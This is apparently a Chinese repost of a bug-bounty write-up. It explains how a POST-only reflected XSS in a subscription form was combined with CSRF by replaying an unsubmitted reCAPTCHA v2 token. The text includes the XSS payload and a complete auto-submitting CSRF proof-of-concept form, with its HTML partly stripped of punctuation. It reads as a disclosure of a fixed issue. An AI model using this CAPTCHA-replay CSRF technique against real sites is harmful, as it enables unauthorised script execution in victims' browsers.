地方门户网站运营方案,个人做电影网站有什么风险,动漫设计专升本考什么,安卓app开发实验报告视频教程在我主页简介或专栏里
#xff08;不懂都可以来问我 专栏找我哦#xff09; 目录#xff1a; 确认 XSS 漏洞 确认 CSRF 漏洞 这个漏洞是我在应用程序的订阅表单中发现的一个 XSS 漏洞#xff0c;只能通过 POST 请求进行利用。通常情况下#xff0c;基于 POST 的…视频教程在我主页简介或专栏里
不懂都可以来问我 专栏找我哦 目录 确认 XSS 漏洞 确认 CSRF 漏洞 这个漏洞是我在应用程序的订阅表单中发现的一个 XSS 漏洞只能通过 POST 请求进行利用。通常情况下基于 POST 的 XSS 如果没有与 CSRF 结合来展示其影响力那么这就是一个普通的反射型 XSSSelf XSS。本来这不会成为一个大问题但这个表单中实现了 Google reCAPTCHA v2。本文将探讨我是如何绕过 CAPTCHA从而成功实现 CSRF 攻击的。 为了保持匿名性我们假设目标网站是 https://www.target.com。当你访问 target.com 时会看到一个注册和登录表单但引起我注意的是一个订阅按钮该按钮会将你引导至 https://www.target.com/subscribe。在这个页面上会显示一个表单。 提交表单后我们会收到一条感谢消息其中显示了我们的名字例如 John。 确认 XSS 漏洞
我们可以使用以下 payload 在该字段中测试反射型 XSS 漏洞
svg/onloadconfirm(document.domain) 当我们提交表单时payload 被成功执行。现在我们已经确认了漏洞的存在但问题在于这个漏洞基于 POST 请求如果没有 CSRF 的配合它就会变成一个自我 XSSSelf XSS。 确认 CSRF 漏洞
如果 CAPTCHA 没有被稳健地实现它并不能保护应用程序免受 CSRF 攻击主要作用只是提供一定程度的速率限制。在解决 CAPTCHA 后会生成三个动态参数captcha_sid、captcha_token 和 g_recaptcha_response。这里的“动态”是指它们的值会在每次解决 CAPTCHA 时发生变化。要构造一个完美的 CSRF 表单我们需要能够为这些参数传递有效的值。 那么如果我在另一个浏览器中解决了 CAPTCHA但不将其提交到服务器而是将这些答案重放到 CSRF 表单中会怎样呢 我在一个私密标签页中打开了表单页面填写了表单内容然后解决了 CAPTCHA。我在 Burp Suite 中启用了拦截功能并点击了提交。请求被拦截后我复制了 CAPTCHA 参数的值并将它们插入到我的 CSRF 漏洞利用演示PoC表单中。
html body h1CSRF PoC/h1 form actionhttps://www.target.com/subscribe methodPOST input typehidden namename_first valuesvg/onloadconfirm(document.domain) / input typehidden namename_last valueDoe / input typehidden nameemail_address valuetestfake.com / input typehidden namecompany_name valueFakeCompany / input typehidden namecaptcha_sid valueINSERT-HERE / input typehidden namecaptcha_token valueINSERT-HERE / input typehidden namecaptcha_response valueGoogle no captcha / input typehidden nameg-recaptcha-response valueINSERT-HERE / input typehidden namecaptcha_cacheable value1 / input typehidden nameop valueSubmit / input typehidden nameform_build_id valueform-Vwtw-XX / input typehidden nameform_id valueXX_subscribe_sign_up_form / input typesubmit valueSubmit request / /form script history.pushState(, , /); document.forms[0].submit(); /script /body/html
剩下要做的就是将这个 CSRF 漏洞利用表单托管起来让受害者访问。受害者访问你的恶意网站后会被重定向到 https://www.target.com/subscribe订阅表单会在没有任何交互的情况下自动提交JavaScript 代码则会在他们的浏览器中执行。 总结来说CAPTCHA 并未绑定到用户的会话因此未提交的其他用户的 CAPTCHA 答案可以被重放用于我们的攻击。
我将这一发现提交给了他们的安全团队他们迅速确认并修复了这个问题。 视频教程在我主页简介或专栏里
不懂都可以来问我 专栏找我哦 申明本账号所分享内容仅用于网络安全技术讨论切勿用于违法途径所有渗透都需获取授权违者后果自行承担与本号及作者无关